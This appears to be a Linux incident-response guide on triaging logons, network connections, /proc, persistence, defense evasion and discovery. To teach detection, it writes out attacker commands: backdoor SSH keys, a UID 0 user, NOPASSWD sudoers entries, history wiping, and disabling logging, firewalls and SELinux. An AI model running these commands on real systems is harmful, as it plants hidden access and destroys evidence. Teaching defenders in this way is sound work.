
Incident Response - Linux

brencronin

Updated: 3 days ago

Linux Incident Response Approach Overview


When conducting incident response on Linux systems, certain types of analysis can be performed quickly and effectively using built-in Linux tools. This initial analysis often provides insights into how the system was compromised and the actions taken during the breach. However, advanced threat actors may employ techniques that complicate the investigation, requiring more time-consuming and sophisticated analysis methods.


This Linux analysis guide begins by focusing on straightforward checks that can yield quick results. Using a baseball analogy, it's like taking a home run swing at the easy targets first. If these initial steps don’t provide definitive answers, the investigation can progress to more advanced techniques for deeper analysis.


Linux systems are often compromised through cracked, stolen, or otherwise compromised credentials. For this reason, one of the first steps in a Linux investigation is examining logon activity:


Examining logon activities


If suspicious login activities are detected or a compromised account shows unusual activity, the analysis should focus on identifying when the threat actor accessed the system. Investigators can then examine the actions performed, using the compromised account, to determine what systems or data were accessed and what activities were carried out.

Whether or not suspicious logons are found, one of the next quickest system checks is to look for suspicious network connections:


Looking for suspicious network connections


The investigation may begin with suspicious network connections, either triggered by alerts from network-based instrumentation and telemetry or identified during system analysis. This step is crucial because if a threat actor installs malware that provides remote access, the system can be accessed without a separate login. Analyzing network activity is often key to identifying malware backdoors and understanding the threat actor's access methods.

If a suspicious network connection is identified, the associated program can be traced by analyzing the /proc file system to determine which binary initiated the connection. Once located, the binary can be further examined to uncover potential malicious behavior or intent.

On compromised systems, a threat actor is likely to engage in the activities below. Different threat actors sequence these activities differently, but indications of certain activities, or combinations of them, can immediately raise the likelihood that the incident is a true positive.


  • Search for signs of persistence

  • Search for signs of defense evasion

  • Search for signs of discovery

  • Search for signs of Command & Control

  • Search for signs of privilege escalation

  • Search for signs of lateral movement

  • Search for signs of exfiltration


In certain investigations, forensic analysis is essential. For instance, memory analysis can reveal memory-resident malware like processes that have deleted disk binaries running in memory, including volatile processes and network data loaded into memory. It can also help detect rootkits, which are often adept at evading live response or disk-based analysis.

In the examples below, red text highlights potential malicious actions performed by a threat actor, illustrating how specific techniques might be executed. Purple text provides examples of using Linux system tools for investigative purposes.


Logon History


Logon success and failures can be found in multiple places within the system.

/var/log/wtmp
/var/log/btmp
/var/log/lastlog
/var/log/audit
/var/log/journal
/var/log/secure

/var/log/wtmp


The /var/log/wtmp file stores a record of login sessions and reboots. It is in a special binary format, so you have to use the last command to dump out its contents:

last -if

The “-i” flag shows IP addresses rather than hostnames (“-a” shows hostnames in the last column), and “-f” allows you to specify a file path other than the default /var/log/wtmp. last shows the newest logins first.


(A login on the local text-mode console appears as “tty1”; if the login had occurred on the graphical console you would see “:0” in the IP address column.)
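To triage logon sources at a glance, per-IP session counts can be tallied from the last output. A minimal sketch, run here against a hypothetical captured sample (in practice, pipe last -i directly into the awk stage):

```shell
# Hypothetical `last -i` output captured for illustration; pipe the real command in practice.
last_output='user1    pts/0        203.0.113.50     Mon Jan  6 10:12   still logged in
user1    pts/1        203.0.113.50     Mon Jan  6 09:01 - 09:45  (00:44)
root     tty1         0.0.0.0          Sun Jan  5 22:10 - 22:15  (00:05)'

# Count sessions per source address (third column) to surface unusual login origins.
printf '%s\n' "$last_output" | awk '{print $3}' | sort | uniq -c | sort -rn
```

An unfamiliar address with a high session count is a natural pivot point for the rest of the investigation.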


Logon counts by user.

for user in `ls /home`; do echo -ne "$user\t"; last $user | wc -l; done

Logon times by user

for user in `ls /home`; do ac $user | sed "s/total/$user\t/" ; done

/var/log/btmp


The btmp file stores information about failed logins, but it does not exist by default. Many administrators choose not to enable btmp logging because it can sometimes disclose user passwords (how many times have you accidentally typed your password into the username field?). If you have a btmp file, you can read it with the lastb command:

lastb -if

/var/log/lastlog


The lastlog file stores the last login information for each user on the system. The file can appear to be huge, but it is actually a sparse file: the offset to any user record is the UID times the size of a lastlog record. You read the file with the lastlog command, which goes line by line through the password file and dumps the lastlog record for each UID it finds there. That means if you are not using the password file from the system /var/log/lastlog was taken from, or if user accounts have since been deleted from that password file, you may not see all the data in the file.


/var/log/audit


The audit log contains a large amount of data and can be difficult to read; Linux provides specialized audit log search tools such as ausearch.


One thing to watch for in the example below: if you are searching the audit log for SSH connections from threat actor IPs, it is easy to drill in on res=success, which stands for result=success.

.......laddr=<IP of host you are investigating> lport=22 exe="/usr/sbin/sshd" hostname=? addr=<threat actor IP> terminal=? res=success'

But if you look earlier in the log line, you will see the output below. This means that someone tried to make an SSH connection, it failed, and the session for it was destroyed.

....msg='op=destroy kind=session fp=? direction=both....
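A quick way to avoid this pitfall is to key on the op= field rather than res= alone. A minimal sketch against a hypothetical, abridged audit line:

```shell
# Hypothetical audit line illustrating the pitfall described above (fields abridged).
line="type=CRYPTO_KEY_USER msg=audit(1700000000.123:456): pid=999 uid=0 msg='op=destroy kind=session fp=? direction=both laddr=10.0.0.5 lport=22 exe=\"/usr/sbin/sshd\" addr=198.51.100.7 res=success'"

# res=success alone is misleading; check the op= field before concluding a login succeeded.
case "$line" in
  *"op=destroy"*) echo "session teardown event, not a successful login" ;;
  *)              echo "inspect further" ;;
esac
```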

/var/log/journal

journalctl _SYSTEMD_UNIT=sshd.service | grep "error"

/var/log/secure


The /var/log/secure file logs security-related activities on a Linux system, including:


  • Authentication events (e.g., via SSH or local logins)

  • Privilege escalation (commands executed using sudo)

  • Service authentication (authentication attempts for services like SSH (sshd) or other system services requiring credentials)

  • Account activity (changes to user accounts or authentication configurations)


By reviewing /var/log/secure, administrators can track who is accessing the system, identify failed login attempts, and monitor the use of elevated privileges. Log analysis often involves sifting through thousands of entries. If you have a specific IP address to investigate, you can filter the logs to focus on that address. Otherwise, you'll need to review multiple entries and apply logical filtering strategies aligned with your investigation objectives. Below are examples of successful and failed SSH login attempts found in /var/log/secure:

cat /var/log/secure | grep sshd | grep 192.168.1.100
MMM DD HH:MM:SS server1 sshd[SSH daemon process ID]: Accepted password for user1 from 192.168.1.100 port 22 ssh2
cat /var/log/secure | grep sshd | grep 192.168.1.101
MMM DD HH:MM:SS server1 sshd[SSH daemon process ID]: Failed password for root from 192.168.1.101 port 22 ssh2

Note: you will also have to check the sshd_config file to determine whether a system administrator or a threat actor configured the server's SSH service to listen on a non-standard port.

grep Port /etc/ssh/sshd_config
Port 2222

Look for suspicious network connections


The built-in Linux tool netstat is a powerful utility for analyzing network connections. It offers numerous command options, documented in the netstat man page: https://linux.die.net/man/8/netstat


The netstat command provides detailed information about network connections on a system, including listening ports and established connections. However, its output can be overwhelming, making it challenging to distinguish legitimate connections from potentially malicious ones.


The netstat output is rarely a definitive indicator of malicious activity on its own unless you’re investigating a specific remote connection identified through other tools or telemetry. If you have additional information, such as suspicious IP addresses or unusual port numbers, you can streamline your analysis by filtering the output with tools like grep.


Without a specific indicator of compromise (IOC), reviewing the netstat output can be tedious. Applying filters to exclude irrelevant data and focus on potentially suspicious connections can significantly simplify the process and make the analysis more efficient.


Examples of useful netstat commands:


  • netstat -pt: Displays network connections with associated processes.

  • netstat -tanp: Provides detailed information, including TCP connections, listening ports, and associated processes.

  • netstat -ltnup:

    • l – show only listening sockets

    • t – show TCP connections

    • n – show addresses in a numerical form

    • u – show UDP connections

    • p – show process id/program name


If you’re investigating a particular remote connection, use grep to filter netstat output for the IP address of interest:

netstat -pt | grep <IP_ADDRESS>

Filtering for Active Connections:


To identify active connections, filter for the keyword ESTABLISHED. The -i option in grep makes the search case-insensitive:

netstat -pt | grep -i ESTABLISHED

Remove unnecessary entries, such as those related to the system loopback address, using grep's -v option. Services bound to 127.0.0.1 or ::1 are listening on localhost; these are accessible from the local machine only and are often set up for backend system services:

netstat -pt | grep -v 127.0.0

Combining filters can streamline analysis:

netstat -pt | grep -i ESTABLISHED | grep -v 127.0.0

When investigating, identify and document the port number associated with suspicious connections. While threat actors often use non-standard ports for malicious activities, analyzing ports in the broader context of the investigation can provide valuable insights.


Pay particular attention to the port number in the "Foreign Address" field, which represents the remote end of the socket. If malware is establishing a reverse shell connection, the local system being investigated will appear as the "Local Address," and the potentially malicious remote server will be listed as the "Foreign Address." Understanding this distinction is critical for accurately tracing and evaluating suspicious network activity.
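Putting the filters together, the remote endpoint and owning process can be pulled out of the netstat output in one pass. A sketch against a hypothetical netstat -tanp sample (the IP, port, and process name are illustrative only):

```shell
# Hypothetical `netstat -tanp` output; in practice pipe netstat itself.
netstat_output='tcp  0  0 10.0.0.5:43210  198.51.100.7:4444  ESTABLISHED 1337/updater
tcp  0  0 127.0.0.1:631   0.0.0.0:*          LISTEN      812/cupsd'

# Keep ESTABLISHED sockets, drop loopback, then print the remote IP plus PID/program.
printf '%s\n' "$netstat_output" \
  | grep -i ESTABLISHED | grep -v '127\.0\.0' \
  | awk '{split($5, fa, ":"); print fa[1], $7}'
```

The remote IP can then be checked against threat intelligence, and the PID fed into the /proc analysis described later.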


If a suspicious network connection is identified, one of the key aspects to analyze is the process ID (PID) responsible for initiating the connection. In the netstat output, this is displayed as a slash-separated pair of the PID and the process name associated with the socket.


If the active process behind the suspicious connection is not identifiable using netstat, alternative built-in Linux tools can be used. The ss command (socket statistics) is particularly useful for uncovering details such as the port number associated with the connection. Additionally, the lsof (list open files) utility can help identify processes tied to specific network connections. For further details, refer to the ss man page (https://man7.org/linux/man-pages/man8/ss.8.html) and the lsof man page (https://man7.org/linux/man-pages/man8/lsof.8.html). These tools provide more flexibility and granularity for analyzing suspicious network activity.

ss -tp | grep <IP of connection you are researching>

Example output of ss.

ESTAB     <server IP investigating>:<high port>  <remote suspicious IP>:<service port>    users:(("program name",pid=<process #>,fd=<fd #>))

Example lsof command.

lsof -i:<port #>

Once you have identified the process ID (PID) associated with the suspicious or confirmed malicious connection, you can conduct a deeper investigation into the process to gather additional insights.


It's important to recognize that if the system under investigation is compromised by a rootkit, the rootkit often conceals its malicious activity, such as IP addresses, ports, and process IDs, from the output of built-in Linux tools like netstat.


Analyzing the Linux /proc filesystem for a suspicious binary


Host-based incident response prioritizes analyzing processes associated with suspicious activities to uncover unusual or anomalous indicators. Effective host analysis goes beyond identifying distinct behaviors, delving into detailed scrutiny of these processes. A critical resource in this effort is the /proc file system. Unlike traditional file systems, /proc does not store data on physical devices; instead, it operates as a virtual file system dynamically generated by the kernel. When a user accesses a file within /proc, the kernel creates its contents in real-time and delivers them to the user, providing invaluable insights during investigations.


The /proc directory contains subdirectories for each process, named /proc/<process ID>, where each subdirectory holds files and data related to the specific process. Most Linux tools that display process information, such as ps, gather their data from the /proc filesystem. Key files and subdirectories tracked for each process include:


  • exe: A symbolic link to the executable file that started the process.

  • cmdline: A file containing the command line arguments used to start the process.

  • cwd: A symbolic link to the current working directory of the process.

  • status: A file with various status information about the process, such as its state (e.g., "Sleeping"), process ID, and parent process ID.

  • environ: A file containing the environment variables set when the process was started.

  • fd: A directory containing symbolic links to the open file descriptors of the process.

  • maps: A file listing memory regions mapped by the process.

  • mem: A file containing the process's memory image; reading this file reveals the contents of the process's memory.

  • stat: A file containing various statistics about the process.

  • task: A directory containing information about the threads (tasks) that are part of the process.


When examining these files with tools like ls -l, you may notice many appear empty. This is because the contents of /proc are dynamically generated by the kernel in real time. To view their contents, you need to use tools like cat. Additionally, some files contain binary data, or are links to binary data, which cannot be viewed with a standard text editor.
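As a concrete illustration, the current shell's own /proc entry can be inspected (substitute any PID you can read for $$):

```shell
# Inspect the shell's own /proc entry; $$ expands to this shell's PID.
readlink /proc/$$/exe                 # path of the running binary (a symbolic link)
tr '\0' ' ' < /proc/$$/cmdline; echo  # cmdline is NUL-separated; translate for readability
awk '/^PPid:/ {print "parent:", $2}' /proc/$$/status
```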


[image]


Key steps for quickly analyzing /proc/<process ID> files include:


  • Checking the parent process ID (PPID) to identify the process that spawned the suspicious process.

  • Hashing the binary associated with the suspicious process.

  • Running strings on the binary to extract readable data.

  • Reviewing the cmdline file to see the command-line arguments used to start the process.


Checking the parent process ID (PPID) to identify the process that spawned the suspicious process.


The parent process ID can be found with pstree or the /proc filesystem.


Using pstree to find the parent process ID of the suspicious process.

pstree -aps <PID>

Using the /proc file system to find the parent process ID of the suspicious process.

cat /proc/<PID>/status

Once the parent process ID (PPID) is identified, you can further investigate that process. If the PPID is 1, the parent is the system management daemon, also referred to as the init process, which is the root of the Linux process tree. Init is the first user-mode process created at boot and remains running until the system shuts down. It manages the system services (daemons) on the system. There are various implementations of init on Linux, including systemd, SysV init, BusyBox init, and Upstart. This analysis will focus on systemd, as it is the most commonly used init system in modern Linux distributions.
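The PPid: line in /proc/<PID>/status can be followed repeatedly to reconstruct a process's full ancestry back to init. A minimal sketch, started from the current shell:

```shell
# Walk the ancestry of a PID up to init (PID 1) using only /proc; start from this shell.
pid=$$
while [ "$pid" -gt 1 ]; do
  comm=$(cat /proc/$pid/comm 2>/dev/null) || break   # process name
  echo "$pid $comm"
  pid=$(awk '/^PPid:/ {print $2}' /proc/$pid/status) # move to the parent
done
```

An unexpected ancestry (for example, a shell spawned by a web server process) is a classic sign of exploitation.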


Hashing the binary associated with the suspicious process


Pull the binary's hash and search for it in CTI sources.

md5sum /proc/<PID>/exe
sha1sum /proc/<PID>/exe

If the hash is known malicious, it can serve as an IOC for searching this system or other systems.

sudo find /bin/ /sbin/ -type f -exec md5sum {} \; | grep <suspicious md5 hash>

Running strings on the binary to extract readable data.


When analyzing the binary in an editor you will mainly see binary data, but sometimes the binary contains readable ASCII strings such as IP addresses, URLs, and other keywords.

strings /proc/<PID>/exe

Pulling IP addresses from strings.

strings /proc/<PID>/exe | grep -aoE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"
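The same regex can be sanity-checked on sample data before running it against a live binary. A sketch using a hypothetical embedded string:

```shell
# Hypothetical strings output from a malicious binary; the IPs are documentation addresses.
sample='connect to 198.51.100.7 on port 4444; fallback http://203.0.113.9/cnc'

# Extract dotted-quad IP addresses with the same regex used above.
printf '%s\n' "$sample" | grep -oE '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b'
```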

Reviewing the cmdline file to see the command-line arguments used to start the process.

cat /proc/<PID>/cmdline

Linux ps


The built-in Linux tool ps (process status) can also be used to find information by process ID. Under the hood, ps pulls its data from the /proc directory.


ps -p <Proc ID>
ps -p <Proc ID> -o command

Linux strace


Another valuable tool for analysis is strace, which allows you to trace system calls (syscalls) made by a process. Syscalls serve as the interface between a service and the kernel, enabling services to request kernel-level operations. Analyzing these syscalls can reveal how malware interacts with the system and provide insights into its behavior and operations.


Strace is a powerful utility for observing and debugging a program's interactions with the operating system. When using strace to analyze malware, ensure that the system is isolated to prevent unintended consequences or propagation.


Here are examples of running strace for analysis:


strace on a PID.

strace -p <PID>

strace on a service, saving the output to a file.

strace -o output.txt ./service

strace tracing only network-related syscalls; this example traces nc listening on UDP port 22.

strace -f -e trace=network nc -lu 22

Search for signs of persistence


Persistence - SystemD


One of the simplest methods for achieving persistence in Linux is configuring a program to auto-start on boot, much like built-in system services. In Linux, the systemd service manager oversees these startup programs. Each program or process managed by systemd is referred to as a unit. Units dictate how services start and run, and they include configuration files that specify actions like start, stop, or restart. To enable a process to start automatically, the following criteria must be met:


  1. Integration with systemd: The process should have a service unit file, typically located in /etc/systemd/system/, with a .service extension.

  2. Manageable with systemctl: The service must be controllable via systemctl, which is the primary interface for managing systemd services.

  3. Startup configuration: The service must be configured to launch automatically during system startup.

  4. System journal logging: The process should write logs to the system journal for monitoring and troubleshooting.


Systemd supports multiple types of units, such as:


  • Service: For managing system services (e.g., nginx.service).

  • Socket: For listening to network sockets.

  • Device: For managing hardware devices.

  • Mount: For filesystem mount points.

  • Target: For grouping services.

  • Timer: For scheduling tasks.


Taken from the article https://javelinsoft.medium.com/creating-a-persistent-ssh-tunnel-using-systemd-b24deef457df, this is an example of a unit file for a service named sshtunnel.service. A service unit has three main sections: [Unit], [Service], and [Install]. Each section then has 'directives' under it.


[Unit]
Description=SSH Tunnel
After=network.target
[Service]
User=root
ExecStart=/usr/bin/ssh -i /path/to/your_private_key -N -L *:local_port:localhost:remote_port username@remote_host
Restart=always
RestartSec=5s
StartLimitInterval=0
[Install]
WantedBy=multi-user.target
Alias=SSHTunnel.service

Pay close attention to directives that start with Exec, because these are special directives that specify actions and scripts to be run when certain activities happen with the service like service start, stop and reload.
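A quick way to review these directives is to grep for lines beginning with Exec. A sketch run against a hypothetical inline unit (point the grep at real unit files in practice, as shown later with find):

```shell
# Hypothetical unit file contents; ExecStopPost here is an illustrative cleanup hook.
unit='[Unit]
Description=SSH Tunnel
[Service]
ExecStart=/usr/bin/ssh -N -L *:8080:localhost:80 user@remote
ExecStopPost=/usr/local/bin/cleanup.sh
[Install]
WantedBy=multi-user.target'

# Pull every Exec* directive out of the unit.
printf '%s\n' "$unit" | grep -E '^Exec'
```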


Unit files can be in different locations on the system depending on how they were installed. Systemd uses all of these directories, and if there is a conflict, the unit files within /etc have the highest priority:


  • /usr/lib/systemd/system/ or /lib/systemd/system/: If installed by the Linux package management system.

  • /etc/systemd/system/: If service configured by system administrator. These are important to note because they were explicitly added.

  • /usr/lib/systemd/user/: Linux users' unit files.

  • /etc/systemd/user/: System administrator unit files

  • ~/.config/systemd/user/: Users' unit files within their home directory, used during a user's login session.

  • /run/systemd/system/: Unit files created at run time. This directory takes precedence over the directory with installed service unit files.

  • Unit files can also include directories with service-specific .conf files.

  • Unit file paths can be viewed with 'systemd-analyze unit-paths' (system mode services).

systemd-analyze unit-paths
  • Unit file paths can be viewed with 'systemd-analyze unit-paths --user' (user mode). This is important because a user with lower privileges can set up systemd persistence through these directories.

systemd-analyze unit-paths --user

For example, if nginx is installed, its service unit file would typically be named nginx.service. Each unit defines how the system starts, manages, and logs the service. Understanding these locations and configurations is key for analyzing and managing system persistence.


Systemd Timers


  • Timers are separate unit files (with a .timer extension)

  • They have independent execution capability and can start services on a schedule


[Unit]
[Timer]
OnBootSec=10m
OnUnitActiveSec=1m
[Install]
WantedBy=timers.target

Analysis of services can be done:


  • Using systemctl

  • Analyzing service logging in the journal

  • Analyzing the service unit files directly


Using systemctl to analyze services


systemctl is the built-in Linux tool for interacting with systemd, and it is the tool admins use to troubleshoot, start, stop, and restart services.


To list all active service units in user mode:

systemctl --user list-units --type=service

To list all active service units:

sudo systemctl list-units --type=service

To list all service files, you can use:

sudo systemctl list-unit-files --type=service

Checking services by state.

systemctl list-unit-files --state=<state>

Services enabled.

systemctl list-unit-files --type=service --state=enabled

Checking the status of the service file:

systemctl status -l <service name>

Analyzing the service unit file.

systemctl cat <service name>

Analyzing the service by PID.

systemctl status <PID>

Look for the 'Active: ... since' line; it could provide information on the start of the infection.


Analyzing service logging in the journal


journald is the systemd daemon that collects logs from various log sources.

journalctl is the built-in tool that lets you interact with the journal logs.

journalctl -u service_name
journalctl -f -u service_name

Searching for time ranges.

journalctl --since "YYYY-MM-DD HH:MM:SS" --until "YYYY-MM-DD HH:MM:SS"

Analyzing the service unit files directly


The service unit file can also be examined directly if its location is known, most commonly in the /etc/systemd/system/ directory.

cat /usr/lib/systemd/system/<service-unit name>
ls -la /etc/systemd/system
ls -la /lib/systemd/system
ls -la /run/systemd/system
ls -la /usr/lib/systemd/system
ls -la /home/*/.config/systemd/user/

find / -path "*/systemd/system/*.service" -exec grep -H -E "ExecStart|ExecStop|ExecReload" {} \; 2>/dev/null
find / -path "*/systemd/user/*.service" -exec grep -H -E "ExecStart|ExecStop|ExecReload" {} \; 2>/dev/null

Note: With the migration to systemd, scripts that previously needed to be implemented in /etc/init.d/ can now be implemented as systemd services. However, /etc/init.d/ is often kept for backward compatibility. Startup services are often managed through configuration files located in the init.d directory:

ls /etc/init.d

Persistence - Cron Jobs

/etc/crontab
/etc/cron.d/*
/etc/cron.{hourly,daily,weekly,monthly}/*
/var/spool/cron/crontabs/* (or /var/spool/cron/* on RHEL-based systems)

Loop through all users' cron files.

sudo bash -c 'for user in $(cut -f1 -d: /etc/passwd); do
  entries=$(crontab -u $user -l 2>/dev/null | grep -v "^#")
  if [ -n "$entries" ]; then
    echo "$user: Crontab entry found!"
    echo "$entries"; echo
  fi
done'

Searching logs for cron executions.

sudo grep cron /var/log/syslog

Persistence - Shell Profiles


Unix shells use various configuration scripts that execute when a shell starts or ends. These scripts can be manipulated to run commands or reverse shells during user login events, creating potential backdoors. Examining these scripts is critical for identifying unauthorized modifications or malicious entries. Key shell configuration files to review:


System-wide files:


  • /etc/profile: Executed at the start of login shells.

  • /etc/profile.d/: Executes all .sh files at the start of login shells.

  • /etc/bash.bashrc: Executed at the start of interactive shells.

  • /etc/bash.bash_logout: Executes when a login shell exits.


User-specific files:


  • ~/.bashrc: Executes at the start of interactive shells.

  • ~/.bash_profile, ~/.bash_login, ~/.profile: User-specific startup scripts; only the first file found is executed.

  • ~/.bash_logout: Executes at the end of a user session for cleanup tasks.


cat /home/*/{.bashrc,.zshrc}
ls -la /home/*/{.bashrc,.zshrc}
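Beyond listing the files, their contents can be screened for common reverse-shell and downloader patterns. A minimal sketch against a hypothetical rc-file snippet; the pattern list is illustrative, not exhaustive:

```shell
# Hypothetical .bashrc contents: one benign line, one planted reverse shell.
rc='alias ls="ls --color"
bash -i >& /dev/tcp/198.51.100.7/4444 0>&1'

# Flag lines matching common backdoor patterns, with line numbers for context.
printf '%s\n' "$rc" | grep -nE 'dev/tcp|bash -i|nc |curl .*\|'
```

On a live system, run the grep across the system-wide and user-specific files listed above, then review each hit in context, since legitimate scripts can also match.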

Persistence - Adding a public key to authorized keys for SSH access.


An authorized_keys file can be placed in the <home>/.ssh/ directory of each user the attacker wants to backdoor. Two example users:

root:x:0:0:root:/root:/bin/bash
user1:x:1000:1001::/home/user1:/bin/bash

Add an authorized_keys file to:

/home/user1/.ssh/authorized_keys
/root/.ssh/authorized_keys

Adding a key to the file.

echo "ssh-hackerkey " >> /home/user1/.ssh/authorized_keys
echo "ssh-kackerkey " >> /root/.ssh/authorized_keys

Searching for keys.


for home_dir in /home/*; do [ -d "$home_dir/.ssh" ] && echo "HOME \"$(basename "$home_dir")\""; [ -d "$home_dir/.ssh" ] && cat "$home_dir"/.ssh/*; done
ls -la -R /home/*/.ssh
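When reviewing keys, the file's modification time is worth capturing alongside its contents, since a recently changed authorized_keys file can be correlated with the incident timeline. A self-contained sketch using a temporary directory standing in for /home (the key material and username are fabricated):

```shell
# Build a disposable stand-in for /home so the sketch is safe to run anywhere.
home=$(mktemp -d)
mkdir -p "$home/user1/.ssh"
echo "ssh-ed25519 AAAAC3...example attacker@evil" > "$home/user1/.ssh/authorized_keys"

# List each authorized_keys file with its timestamp, then dump its entries.
find "$home" -name authorized_keys -exec ls -l {} \; -exec cat {} \;

rm -rf "$home"
```

On a real system, point the find at /home and /root instead of the temporary directory.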

Persistence - /etc/passwd Modification: Directly adding users to /etc/passwd.


Could be new (admin) accounts added, or unlocked application role accounts. Leveraging existing accounts can be common, particularly application accounts like www or mysql that are normally locked. If the attacker sets a reusable password on these accounts, they can use them to access the system remotely.


/etc/passwd file overview


Each field is separated by the colon (:) character; the fields of the passwd file format are:


  • Username

  • Password Placeholder (x indicates encrypted password is stored in the /etc/shadow file)

  • User ID (UID)

  • Group ID (GID)

  • Personal Information (separated by commas) – can contain full name, department, etc.

  • Home Directory

  • Shell – absolute path to the command shell used (if /sbin/nologin, then login isn't permitted and the connection gets closed)


Add a password and make www-data a sudoer.

sudo passwd www-data  
sudo usermod -aG sudo www-data

Then allow www-data to SSH in: modify its /etc/passwd entry from nologin to bash.

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
//change to
www-data:x:33:33:www-data:/var/www:/bin/bash

Persistence - Backdoor User: Creating a backdoor user with uid=0 (root privileges).


Add testuser.

sudo adduser testuser
cat /etc/passwd | grep testuser
testuser:x:1001:1001::/home/testuser:/bin/sh

Change the UID of testuser to 0.

sudo usermod -u 0 -o testuser
host:/$ cat /etc/passwd | grep testuser
testuser:x:0:1001::/home/testuser:/bin/sh

Any account with user ID zero has admin-level access. Normally there should be only a single “root” account with UID 0 in the password file, but multiple UID 0 accounts are allowed. Sort the passwd file numerically by UID so UID 0 accounts are easy to spot:

sort -t : -k 3 -n /etc/passwd
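The UID 0 check can also be expressed directly with awk on the colon-separated fields. A sketch against a hypothetical passwd snippet (run it against /etc/passwd on the real system):

```shell
# Hypothetical /etc/passwd content with a planted UID-0 backdoor account.
passwd='root:x:0:0:root:/root:/bin/bash
user1:x:1000:1000::/home/user1:/bin/bash
backdoor:x:0:1001::/home/backdoor:/bin/sh'

# Print the username of every account whose UID (field 3) is zero.
printf '%s\n' "$passwd" | awk -F: '$3 == 0 {print $1}'
```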

Persistence - Sudoers Backdoor: Adding a user to sudoers for root commands.


The Linux sudoers 'super user do' file defines permissions for users and groups to execute commands with elevated (root) privileges using the sudo command. It controls who can use sudo, what commands they can execute, and on which hosts. Properly configuring the sudoers file enhances system security by granting least privilege access. Threat actors will want to add users and edit this file to ensure that a compromised account they may use has elevated access.



vi /etc/sudoers
<compromised account> ALL=(ALL) NOPASSWD: ALL

Format for each line is:


 <Who> <OnWhich Systems> <commands and parameters>
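Entries granting passwordless root are a common backdoor marker, so grepping for NOPASSWD is a quick check. A sketch against hypothetical inline sudoers content (on a live system, review /etc/sudoers and /etc/sudoers.d/*):

```shell
# Hypothetical sudoers content; the wwwrun entry is a planted passwordless-root grant.
sudoers='root ALL=(ALL) ALL
wwwrun ALL=(ALL) NOPASSWD: ALL'

# Flag NOPASSWD grants with line numbers for review.
printf '%s\n' "$sudoers" | grep -n 'NOPASSWD'
```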


Persistence - Package Manager Persistence: Leveraging APT/YUM/DNF package managers.


Packages may include scripts or binaries that install backdoors, execute malicious code, or escalate privileges. Common techniques include:


  • Repository Poisoning: Hosting or compromising a repository to distribute malicious packages.

  • Fake Packages: Creating packages with names resembling legitimate ones to exploit user mistakes.

  • Post-Installation Scripts: Embedding malicious commands in pre- or post-installation scripts that execute during package installation.

  • Dependency Hijacking: Adding malicious dependencies to otherwise legitimate packages.


Once installed, these backdoors can provide persistent access, execute commands, or exfiltrate data, often disguised as legitimate system processes or files.


Items to check related to packages include:


  • Packages installed and their versions?

  • Installation information (Who, when, how)?

  • Packages upgraded?

  • Packages removed?

  • Repos used?

  • Package integrity verification

  • For a suspicious file, can the package it belongs to be determined?


The log for package related activity.

/var/log/dpkg.log

or

/var/log/apt/history.log
/var/log/apt/term.log

Examining details related to a specific package.

awk ' /^Package: <package name>$/ , /^$/ ' /var/lib/dpkg/status
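The awk range pattern can be verified on sample data before running it against the real status database. A sketch against a hypothetical /var/lib/dpkg/status fragment with two package stanzas:

```shell
# Hypothetical dpkg status fragment; stanzas are separated by blank lines.
status='Package: openssh-server
Status: install ok installed
Version: 1:9.2p1

Package: nginx
Status: install ok installed
Version: 1.22.1
'

# The range pattern prints everything from the matching Package: line to the next blank line.
printf '%s\n' "$status" | awk '/^Package: nginx$/ , /^$/'
```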

Search for signs of defense evasion


Adding timestamps is useful when examining shell histories.

export HISTTIMEFORMAT="%F %T "

  • %F shows the date in YYYY-MM-DD format.

  • %T shows the time in HH:MM:SS format.


Defense Evasion - Hiding or Clearing Shell History


The threat actor may also try to hide their shell history. Common examples include: clearing the history file (history -c); unsetting the history file variable so no data can be stored there (unset HISTFILE); configuring the history to ignore certain commands (export HISTIGNORE); and setting the history file to log a smaller number of commands, where the default is 500 (export HISTFILESIZE=10). See: https://digi.ninja/blog/hiding_bash_history.php, https://www.cyberciti.biz/faq/disable-bash-shell-history-linux/

history -c
unset HISTFILE 
export HISTIGNORE="ls*:cat*"
export HISTFILESIZE=10
history -d <line number>

Finding history files symlinked to /dev/null.

ls -alR / 2> /dev/null | grep .*history | grep null

Preventing history logging at the start of a new shell.

echo "unset HISTFILE" >> ~/.bash_profile; echo "unset HISTFILE" >> ~/.bashrc;

Clearing history at logout

echo "history -c" >> ~/.bash_logout

Leave bash history enabled but misconfigured: with HISTCONTROL set to ignorespace, any command prefixed with a space is not logged.

HISTCONTROL=ignoredups:ignorespace

Consider making users' .bash_history append-only so they cannot delete it.

sudo chattr +a .bash_history

Defense Evasion - Log tampering

service rsyslog stop
systemctl disable rsyslog
/etc/init.d/syslog stop

Example of searching the audit log for the execution of a command stopping a service:

ausearch -i -m execve | grep "systemctl stop"

The audit log can also be searched for manipulation of key audit log settings.


/etc/audit/auditd.conf - Global settings for the audit daemon

/etc/audit/rules.d/<rules> - audit rules defining specific events and conditions for monitoring

/etc/audisp/audispd.conf - Configures the audit event dispatcher

/etc/libaudit.conf - Manages library-level settings for the audit framework
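To catch tampering with these files, the audit daemon can be told to watch its own configuration. A hedged sketch of watch rules that could be dropped into a rules file (the file name and key are illustrative):

```shell
# /etc/audit/rules.d/audit-config.rules (illustrative rules file)
# -w = watch path, -p wa = write/attribute changes, -k = search key
-w /etc/audit/ -p wa -k audit-config
-w /etc/audisp/ -p wa -k audit-config

# Later, search the audit log for hits on that key:
# ausearch -i -k audit-config
```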


Defense Evasion - Disabling Linux Firewalls


firewalld

systemctl stop firewalld
systemctl disable firewalld

IPTables

service iptables stop

(Note: An advanced tactic could also be to add or edit specific firewall rules).


Defense Evasion - SELinux

setenforce 0

(Note: setenforce 0 switches SELinux to permissive mode, so policy violations are logged but no longer blocked.)

Search for signs of discovery


Linux systems offer a vast array of built-in shell commands and utilities that threat actors can leverage to achieve their objectives. As a result, Linux-specific malware is often unnecessary on compromised systems; instead, attackers commonly rely on script files that misuse standard Linux utilities in malicious ways. Many of these utilities exploited for nefarious purposes are cataloged in the Linux "Living off the Land" project, also known as GTFOBins: GTFObins: https://gtfobins.github.io/


Here are examples of potentially suspicious shell commands. However, keep in mind that legitimate administrative tasks or scripts may also use some of these commands. Effective analysis relies on understanding the context in which these commands are executed.


Threat Actors will want to know the system they are on to determine if it has an exploitable vulnerability.

uname -r
cat /proc/version
cat /etc/os-release

The Threat Actor will also want to know the user context they are operating as:

whoami

Threat actors will want to know which shell they are in (for example, whether they have landed in a restricted shell such as rbash):

echo $SHELL

Check the environment variables:

env

or

printenv

